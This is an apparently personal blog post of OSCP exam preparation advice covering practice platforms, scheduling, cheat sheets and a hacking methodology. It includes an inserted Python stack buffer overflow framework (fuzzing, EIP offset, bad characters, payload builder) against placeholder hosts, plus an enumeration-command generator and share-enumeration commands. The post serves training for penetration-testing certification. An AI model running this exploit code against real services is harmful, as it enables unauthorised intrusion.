Avoiding Common OSCP Pitfalls🕳

Learn from painfully common mistakes that contributed to my initial failure and how to pass the Offensive Security Certified Professional exam. I went from a 35 point fail to a 100 point pass a few months later.

This post is written to help those on their ‘OSCP journey’, practicing hard on vulnerable machine platforms for their OSCP exam attempt. I want to improve your chances of passing by sharing my common mistakes, tips for success, and how to practice most effectively. I’ve read hundreds of “OSCP journey” or “OSCP review” type posts like this one during my dive into the OSCP. I’m well aware of the common mistakes from first and second hand experience. This post is my accumulation of all of that experience.

What you will learn from this post:

  • Best ethical hacking platform to practice on for the OSCP exam
  • Essential tools to use every day during OSCP prep
  • Insights on lab report and hacking methodology

Initial Prep

The second month was spent in the PWK lab environment. Then I spent one more month doing TJnull’s OSCP-like Hack the Box list, including doing some of the VulnHub boxes listed on there. I also completed Tib3rius’ Windows and Linux Privilege Escalation Udemy courses and The Cyber Mentor’s Practical Ethical Hacking Udemy course. Of course I took a great abundance of notes on the courses I took and the vulnerable machines hacked.

How to Fail

I cracked the buffer overflow and the 10 point machine in the first couple of hours, then got stumped for the rest of the exam. I was able to find remote code execution on one machine but couldn’t get a shell on the target even after trying different shell spawning commands for hours.

Hints and Write-ups

Enumerate. Enumerate. Enumerate

Reading about OSCP, you will see this often. But what exactly does it mean?

Enumeration is systematically discovering what is on a target (open ports, service versions, file shares, web content, user names) in order to find the initial vulnerability. It can also refer to the same process once you’ve accessed the target and are looking for a way to escalate privileges. During PWK labs and Hack the Box labs, this process takes up the majority of your time. I commonly went to Discord servers and PWK forums to find hints to the PWK boxes. When doing Hack the Box it was even worse because I could look up write-ups for retired machines with ease.

Getting dependent on hints and write-ups is a major problem, because your hacking methodology becomes something like this:

  1. Get stuck
  2. Get hint
  3. Pwn machine.

But when you’re taking the OSCP exam, step 2 in that methodology is not an option, so your process becomes this:

  1. Get stuck

That’s exactly what happened my first exam attempt.

Using walk-throughs and hints is absolutely necessary when you’re first learning to pwn your first dozen vulnerable machines or so. If you’re totally green and have never attempted a vulnerable machine before, you’ll have no idea what to expect if you don’t read some walk-throughs and watch some YouTube videos about hacking vulnerable machines first.

However, when you’re months into your OSCP prep like I was, and you’re dependent on write-ups like I was for practice, you’re robbing yourself of learning one of the biggest skills that OSCP tests for: self-reliance. On the OSCP exam, you’re on your own; you have to enumerate, research, and hack on your own!

This may sound very obvious, but it’s an easy mistake to make because our brains err towards being lazy to conserve energy. It simply takes less effort to hack a vulnerable machine using a walk-through than to struggle to hack a machine on your own, though you’re learning much more doing the latter. Don’t fall into the mistake of using hints and write-ups too often.

A balance must be achieved between using hints and hacking on your own. If you’ve spent a few days stuck on a box you’re practicing on, then a hint is alright. But if it’s only been an hour or two, keep enumerating!

Understand rabbit holes.

Schedule carefully…

I picked 3PM thinking I could really sleep in and relax before the exam. Wrong. I could barely sleep the night before exam day from nerves. I woke up at 7AM on exam day. I couldn’t relax at all because I was too anxious anticipating the exam. So for 8 hours, from 7AM to 3PM, I was bugging out, waiting for the exam to start. I was mentally exhausted just from waiting to begin the exam.

I figured starting so late in the day at 3PM would allow me to keep my normal sleep schedule, since I could go to bed at a reasonable time, rest up and still have plenty of time, as the exam would not end until 2:45PM the next day. Wrong. I couldn’t sleep at all while the exam was going. I got 2 hours of a feverish nap and then couldn’t function well for the rest of the exam.

Lesson Learned: Think hard about when exactly you’re going to start your exam. If you’re like me and can’t sleep when something important is going on, account for that.

How to Succeed

After about 24 hours from submitting the OSCP exam and lab report I got back the email saying I passed! So why did I succeed the second attempt?

Also a few months later I got this sweet certificate and card:

Proving Grounds

  1. Proving Grounds is owned by Offensive Security (the same folks running the OSCP exam). The machines they host on Proving Grounds are the same flavor as the PWK labs and the machines I found on the exam: the same type but not the same difficulty. PWK lab machines are much easier on average compared to exam machines, while Proving Grounds machines are slightly more difficult than the exam machines. The slight difficulty increase in the Proving Grounds machines makes it perfect practice for the OSCP exam. It’s the closest you can get to practicing on real exam machines, with even a few officially retired exam machines available.
  2. Less fluff than you’ll find in Hack the Box and PWK labs. By fluff, I mean things that aren’t tested for in the OSCP exam currently. Things like pivoting, Active Directory, machines that have dependencies, or CTF-like crap that doesn’t help you learn enumeration or privilege escalation. Ironically, PWK labs have a lot of pivoting and dependency machines that are essentially wasting your time doing things you don’t need to know for the exam.
  3. Write-ups and hints are harder to come by. This is an important point as it pushes you more to hack machines on your own and not fall into the trap of over-relying on hints. Compare that to hacking retired machines in Hack the Box, where finding answers for boxes is a Google search away. Hack the Box write-ups were something my brain (me), wanting to be lazy, found hard to resist. In Proving Grounds, hints and write-ups can actually be found on the website. However, it costs you the precious points you gain when you hack machines without hints and write-ups. The points don’t really mean anything, but it’s a gamified way to disincentivize using hints and write-ups that worked really well on me.
  4. Proving Grounds is cheaper than buying a month of PWK labs.

If you can consistently crack intermediate difficulty machines and higher on Proving Grounds on your own, you should feel confident going into the OSCP exam.

How to pwn the Buffer Overflow no problem

Follow these 3 steps for a stress free 25 points on the OSCP exam.

  1. Understand the buffer overflow.

There are hundreds of great resources about learning a stack buffer overflow. If the OSCP textbook isn’t explaining it well enough for you, I recommend The Cyber Mentor’s videos on the topic:

  2. Automate the buffer overflow.

There are quite a few scripts floating around GitHub that speed up the steps of the buffer overflow, like the one linked below. Gh0x0st’s script is the one I happened to use on the exam. Only start using this once you fully understand the “manual” way.

I should note that on the exam, I ran through the BOF machine in 25 minutes using the script below. But then I did it the more “manual” way to document it in the OSCP exam report, just in case Offsec wanted to fail me for using an “automated” tool. Though I’ve read people passed using BOF scripts before, it’s your choice.

  3. Master the buffer overflow.

Practice using Gh0x0st’s script, then creating the buffer overflow proof of concept, then executing it for the reverse shell until you can get a 45 minute buffer overflow time, though you could easily get it down to 20–30 minutes. The Try Hack Me room linked below is the best practice you’ll get for the OSCP buffer overflow.

Follow these steps until you master the buffer overflow, and you shouldn’t stress about the BOF on the exam!
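The three steps above (fuzz to a crash, find the EIP offset with a cyclic pattern, hunt bad characters, then build the final buffer) as one added Python example. This is not the author's script and not Gh0x0st's; the target host, port and the "OVERFLOW1 " command prefix are placeholders for a typical OSCP-style practice service, and the offline walk-through at the bottom simulates the crash values a debugger would show so the helpers can be checked without a target:

```python
"""Added example of the OSCP-style stack buffer overflow workflow: fuzz, offset,
bad characters, final buffer. Host, port and PREFIX below are placeholders."""
import itertools
import socket
import string
import struct

TARGET_HOST = "10.10.10.10"   # placeholder, not a real target
TARGET_PORT = 1337            # placeholder
PREFIX = b"OVERFLOW1 "        # placeholder command the vulnerable service accepts


def cyclic_pattern(length: int) -> bytes:
    """Same scheme as msf-pattern_create: Aa0Aa1...Az9Ba0... Every 4-byte window
    is unique for the first 20280 bytes, so an EIP value maps to one offset."""
    out = bytearray()
    for u, l, d in itertools.product(string.ascii_uppercase, string.ascii_lowercase, string.digits):
        if len(out) >= length:
            break
        out += (u + l + d).encode()
    return bytes(out[:length])


def pattern_offset(pattern: bytes, eip_value: int) -> int:
    """Offset of the 4 bytes that overwrote EIP (x86 is little-endian, so the
    register shows them reversed); -1 if the value did not come from the pattern."""
    return pattern.find(struct.pack("<I", eip_value))


def badchar_string(exclude=(0x00,)) -> bytes:
    """\\x01..\\xff minus bytes already known to be bad. Send it right after the
    EIP overwrite and compare the stack dump against what was sent."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def first_badchar(sent: bytes, dumped: bytes):
    """First byte that was mangled in memory, or None. Bytes after a bad character
    are unreliable, so exclude it, resend, and repeat until the dump is clean."""
    for s, d in zip(sent, dumped):
        if s != d:
            return s
    return None


def build_payload(offset: int, ret_addr: int, shellcode: bytes, badchars: bytes = b"\x00",
                  nops: int = 16, prefix: bytes = b"") -> bytes:
    """prefix + padding up to EIP + JMP ESP address (little-endian) + NOP sled + shellcode.
    Refuses to build a buffer whose address/sled/shellcode contains a known bad char."""
    body = struct.pack("<I", ret_addr) + b"\x90" * nops + shellcode
    clash = set(body) & set(badchars)
    if clash:
        raise ValueError(f"payload contains bad chars: {sorted(hex(c) for c in clash)}")
    return prefix + b"A" * offset + body


def send_buffer(data: bytes, host=TARGET_HOST, port=TARGET_PORT, timeout=5) -> bytes:
    """Send one buffer to the service and return its reply (b"" if it went silent)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)                      # banner
        s.sendall(data + b"\r\n")
        try:
            return s.recv(1024)
        except socket.timeout:
            return b""


def fuzz(step=100, max_len=3000, **kw):
    """Step 1: grow the buffer until the service stops answering or refuses
    connections. The size that killed it bounds the pattern length for step 2."""
    for size in range(step, max_len + 1, step):
        try:
            if send_buffer(PREFIX + b"A" * size, **kw) == b"":
                return size
        except OSError:                   # connection refused/reset: service is dead
            return size
    return None


if __name__ == "__main__":
    # Offline walk-through of steps 2-4 with a simulated crash (no socket used).
    pattern = cyclic_pattern(2000)
    simulated_eip = int.from_bytes(pattern[1978:1982], "little")   # what the debugger would show
    off = pattern_offset(pattern, simulated_eip)
    print(f"EIP = {simulated_eip:#010x} -> offset {off}")
    sent = badchar_string()
    dumped = sent.replace(b"\x0a", b"\x00")                         # pretend \x0a got truncated
    print("first bad char:", hex(first_badchar(sent, dumped)))
    buf = build_payload(off, 0x311712f3, b"\xcc" * 4, badchars=b"\x00\x0a", prefix=PREFIX)
    print(f"final buffer is {len(buf)} bytes; send_buffer(buf) once your listener is up")
```

The order matters: the JMP ESP address must be checked against the bad-character list as well as the shellcode, which is why build_payload refuses a null-containing address rather than silently sending a buffer that will never reach the sled.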

Make Cheat Sheets!

For example, here’s a part of my initial enumeration cheat sheet documenting how to enumerate each port:

Here’s the outline for my OSCP buffer overflow cheat sheet which documents each step:

I’m not going to share exactly what I put on my cheat sheets because that will not help you! There are dozens of very impressive looking, publicly available, OSCP cheat sheets out there. I had many of them opened up on tabs all during my OSCP exam attempt. That was during the attempt I failed.

The attempt that I passed I had no cheat sheets up, not even my own! That’s because by creating your own cheat sheets, you review all the information you gathered while hacking vulnerable machines. You need to review all the notes you made previously to create effective cheat sheets. Reviewing those notes then documenting it again really helps with memorizing and understanding what is important while enumerating.

Time spent trying to study other peoples cheat sheets, is much much better spent creating your own cheat sheets.

Completing the lab report is not worth it.

I’m sure the folks at Offensive Security put a lot of work into the nearly 1000 page textbook, but the exercises are loosely connected concepts that feel too abstract as you’re working through them. Everything you learn in the exercises you can learn more effectively just by hacking vulnerable machines and watching ippsec. As you’re actually hacking vulnerable machines, you’re more effectively learning the concepts you would in the PWK exercises, rather than learning about the concepts in isolation.

You ought to practice enough that you’re over-prepared. To the point you don’t need to stay up 23 hours to barely pass at 65 points + your lab report. Staying up a whole day and night, stressing out, trying to accomplish something you’ve been preparing for for months. That’s no fun. Over-prepare instead. I believe the exam is meant to be passed in under 12 hours. Offsec giving you 24 hours to complete the exam is just for the intimidation factor. Go to Proving Grounds, create cheat sheets, study like hell.

However, I understand the peace of mind that comes along with having an extra 5 points on the exam. That’s what pushed me to complete all the exercises. Documenting 10 PWK lab machines is also good practice for when you’re going to write the exam report. If you’re planning on doing the exercises I made some checklists:

Exam Report

Hacking Methodology

The following is by no means an exhaustive list of things to do that will get you to hack every vulnerable machine, but it should give you an idea of how to structure your own hacking methodology as you develop it.

Initial Enumeration

ftp 10.10.10.10            # try anonymous login (user: anonymous, any password)
showmount -e 10.10.10.10   # list NFS exports
smbclient -L 10.10.10.10   # list SMB shares (try an empty password when prompted)

Hints, creds and other low hanging fruit are commonly put in these file shares.

If no information is found in open shares, start looking at websites. Browse to every strange port found by nmap scans in case it’s a website:

For every port hosting a website, run gobuster scans using the following wordlists. NmapAutomator does some of these scans for you already.

/usr/share/seclists/Discovery/Web-Content/common.txt
/usr/share/seclists/Discovery/Web-Content/big.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
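The share-first, then-every-web-port order described above, as an added Python example that turns an nmap grepable (-oG) line into the command list. This is not the author's tooling or NmapAutomator; the sample nmap line is constructed, the three wordlist paths are the ones listed above, and the ftp/showmount/smbclient/gobuster/curl invocations use only standard flags (gobuster's dir mode with -u, -w, -t, -k, -o):

```python
"""Added example: generate first-pass enumeration commands from an nmap -oG line.
Shares first, then gobuster per wordlist for every HTTP-looking port, then a quick
curl at any unidentified port in case it is a website. Sample input is constructed."""
import os
import re

WORDLISTS = [
    "/usr/share/seclists/Discovery/Web-Content/common.txt",
    "/usr/share/seclists/Discovery/Web-Content/big.txt",
    "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt",
]

# port -> share check; the same three commands the post lists
SHARE_CHECKS = {
    21: "ftp {ip}",
    111: "showmount -e {ip}",
    2049: "showmount -e {ip}",
    139: "smbclient -L {ip}",
    445: "smbclient -L {ip}",
}

WEB_PORTS = {80, 443, 8000, 8080, 8443}

# Constructed nmap -oG line (not real scan output): entries are
# port/state/proto/owner/service/rpcinfo/version/ separated by ", ".
SAMPLE_LINE = (
    "Host: 10.10.10.10 ()\tPorts: 21/open/tcp//ftp//vsftpd 3.0.3/, "
    "80/open/tcp//http//Apache httpd 2.4.29/, 139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X/, "
    "445/open/tcp//netbios-ssn//Samba smbd 4.7.6/, 2049/open/tcp//nfs_acl//2-3 (RPC #100227)/, "
    "3306/filtered/tcp//mysql///, 5000/open/tcp//upnp?///, 8080/open/tcp//http-proxy?///"
    "\tIgnored State: closed (9992)"
)


def parse_grepable(line: str):
    """Return (host, [ {port, proto, service, version}, ... ]) for open ports only."""
    host = re.search(r"Host:\s+(\S+)", line)
    ports = re.search(r"Ports:\s+([^\t]+)", line)
    if not host or not ports:
        return (host.group(1) if host else None), []
    found = []
    for entry in ports.group(1).split(", "):
        f = entry.split("/")
        if len(f) < 7 or f[1] != "open":
            continue
        found.append({"port": int(f[0]), "proto": f[2], "service": f[4], "version": f[6]})
    return host.group(1), found


def is_web(p) -> bool:
    return "http" in p["service"] or p["port"] in WEB_PORTS


def is_unknown(p) -> bool:
    # nmap appends "?" when the service guess is unconfirmed
    return p["service"] == "" or p["service"].endswith("?")


def enumeration_plan(ip: str, ports) -> list:
    plan = []
    # 1. file shares: hints and creds are the usual low-hanging fruit
    for p in ports:
        tmpl = SHARE_CHECKS.get(p["port"])
        if tmpl and tmpl.format(ip=ip) not in plan:
            plan.append(tmpl.format(ip=ip))
    # 2. every web port gets one gobuster run per wordlist, output saved per port
    for p in ports:
        if is_web(p):
            scheme = "https" if p["port"] in (443, 8443) or "ssl" in p["service"] else "http"
            url = f"{scheme}://{ip}:{p['port']}"
            tls = " -k" if scheme == "https" else ""
            for wl in WORDLISTS:
                name = os.path.splitext(os.path.basename(wl))[0]
                plan.append(f"gobuster dir -u {url} -w {wl} -t 50{tls} -o gobuster_{p['port']}_{name}.txt")
    # 3. strange ports: look before moving on, it may be a website nmap did not recognise
    for p in ports:
        if is_unknown(p) and not is_web(p):
            plan.append(f"curl -sk -m 5 -i http://{ip}:{p['port']}/ | head -n 20")
    return plan


if __name__ == "__main__":
    host, open_ports = parse_grepable(SAMPLE_LINE)
    print("\n".join(enumeration_plan(host, open_ports)))
```

Run it against your own scan with the line from `nmap -sV -oG scan.gnmap` for the host; the point is the ordering and the "nothing gets skipped" coverage, not the specific commands, which you should replace with whatever your cheat sheet says for each port.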

Search every website and sub-directory for interesting services or files containing potential usernames and/or passwords. Test every search bar and user input for web application vulnerabilities: SQL injection, command injection, LFI and RFI are the most common. There are too many ways to attempt to exploit these vulnerabilities to summarize in a blog post. Use this website; it essentially tells you how to exploit every web application vulnerability that’s common to OSCP-like machines:

Finding Exploits

For instance the service Microsoft IIS 6.0 pops up in an nmap scan:

Make it a reflex to google search like this:

There are certain websites you should particularly look out for in your exploit search that I found extremely useful.

Exploit-db

Exploit-db is also owned by Offensive Security. Any exploits you find on the exam, Offsec has to already know about, and have in their Exploit-db already… Therefore every exploit you’re going to need is on exploit-db? I can’t say for certain on this point, but it does make sense. Search with exploitdb:

Hacking Articles

This is an excellent blog about all things cybersecurity, and has a ton of information about vulnerable machine hacking that’s of interest to us. For certain privesc routes and Content Management Systems you’ll find in vulnerable machines, this blog has wonderful articles clearly explaining how to exploit them.

HackTricks

This website looks a lot like a cheat sheet, and I still stand by my advice that you should ignore cheat sheets and make your own. But it’s a cheat sheet that’s so expansive that the search bar is like a Google just for hacking vulnerable machines. There is so much information that I’ve found the initial enumeration or privesc route is already contained within this website roughly 50% of the time.

RCE to Shell

This is a topic that’s commonly overlooked in discussions about OSCP practice, but it’s extremely important to know how to do, else you’re going to be stuck trying to learn it on the spot until the last sad hours of an exam attempt (yes, I’m speaking from experience).

I made a whole other blog post on this topic:

Privilege Escalation

Whether you’re on a Windows or Linux target, the privesc vectors you’re enumerating for will be different. There are hundreds of different privesc exploits; document every exploit you come across during prep in your notes, and separate them by Windows and Linux. To give you an idea of how to structure your notes, here’s what my Linux (left) and Windows (right) notes look like in Joplin:

Just like with enumerating for initial exploits, this is where experience and hacking a lot of vulnerable machines play a big role. Knowing what to look for comes with experience and building your own hacking methodology. However, privesc scripts help out a lot. For Windows, you should always run WinPEAS:

For Linux I use lse.sh:

These scripts will quickly print out a bunch of potential privesc vulnerabilities. For instance, they’ll highlight in big red characters if the kernel version on the machine is old, indicating a potential kernel exploit.

Be aware that these scripts will spit out plenty of false positives (a highlighted kernel version does not mean a working exploit exists for that exact build), so be careful you don’t go running down a rabbit hole because of a script’s output.

Essential Non-Hacky Tools

Joplin

Whenever I was hacking a vulnerable machine, I had Joplin open, documenting everything I found and looking back on notes from previously hacked machines for reference. You need to be taking notes with something. Joplin is the best because it can sync and search notes, has dark mode and Vim mode, and makes it really easy to paste in screenshots from the clipboard, all while being FOSS.

Flameshot

Flameshot makes taking screenshots and editing them very simple. Bind it to a key and it becomes a reflex while practicing to screenshot important terminal output and other items of interest while hacking vulnerable machines. Once it becomes a reflex, taking screenshots and pasting them into your Joplin notes makes documentation very fast.

Tmux

Tmux is great for organizing windows within a terminal. It can do much more than that, but that’s the extent of what you need it for in OSCP prep and the exam. I usually used a 4 pane setup like the one above and switched between the panes while hacking a machine. I set up different tmux windows to compartmentalize each target during the exam. With a setup like this, switching between exam machines is as simple as hitting three buttons:

Each orange number represents a different window for each target that can be switched to.

If you are to take away at least three things from this post:

  1. Take tons of notes
  2. Don’t over rely on hints and write-ups
  3. Use Proving Grounds

Happy hacking.
